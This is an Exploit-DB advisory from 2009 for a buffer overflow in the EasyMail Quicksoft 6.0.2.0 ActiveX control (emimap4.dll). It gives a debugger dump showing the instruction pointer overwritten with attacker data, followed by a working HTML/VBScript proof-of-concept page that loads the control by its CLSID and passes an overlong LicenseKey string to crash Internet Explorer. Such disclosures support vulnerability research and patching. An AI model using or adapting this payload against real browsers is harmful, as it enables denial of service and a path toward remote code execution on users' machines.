EasyMail Quicksoft 6.0.2.0 - ActiveX Remote Code Execution (PoC)

EDB-ID:

9684

CVE:


EDB Verified:

Author:

Francis Provencher

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2009-09-15

Vulnerable App: 
#####################################################################################

Application:  EasyMail Quicksoft 6.0.2.0
            
Platforms:    Windows XP Professional French SP2

crash:	      IE 6.0.2900.2180
	      
	
Exploitation: remote Code Execution

Date:         2009-08-24

Author:       Francis Provencher (Protek Research Lab's)
             

#####################################################################################

1) Introduction
2) Technical details and bug
3) The Code

#####################################################################################

===============
1) Introduction
===============

Create, send, download, parse, print and store internet email messages in your classic windows application.  Designed for Visual Basic, ASP, C++, Delphi, ColdFusion, PowerBuilder, Access and other development environments.  COM or standard DLL interfaces.  This is the software that processes hundreds of millions of email messages on the Internet every day.

#####################################################################################

============================
2) Technical details 
============================

Name:	emimap4.dll
Ver.:	6.0.2.0
CLSID:	{0CEA3FB1-7F88-4803-AA8E-AD021566955D}

ModLoad: 037f0000 0381e000   C:\WINDOWS\system32\emimap4.dll
(2088.2388): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0380c878 ecx=0012df70 edx=00000039 esi=0033df18 edi=0033e14c
eip=41414141 esp=0012df88 ebp=41414141 iopl=0         nv up ei pl zr na pe nc





#####################################################################################

===========
3) The Code
===========

Proof of concept DoS code;

<HTML>
<object classid='clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D' id='target'></object>
<script language = 'vbscript'>



  Scrap  =   unescape("http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")


  code = Scrap


  target.LicenseKey = code


</script>
<html>
~



#####################################################################################

# milw0rm.com [2009-09-15]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services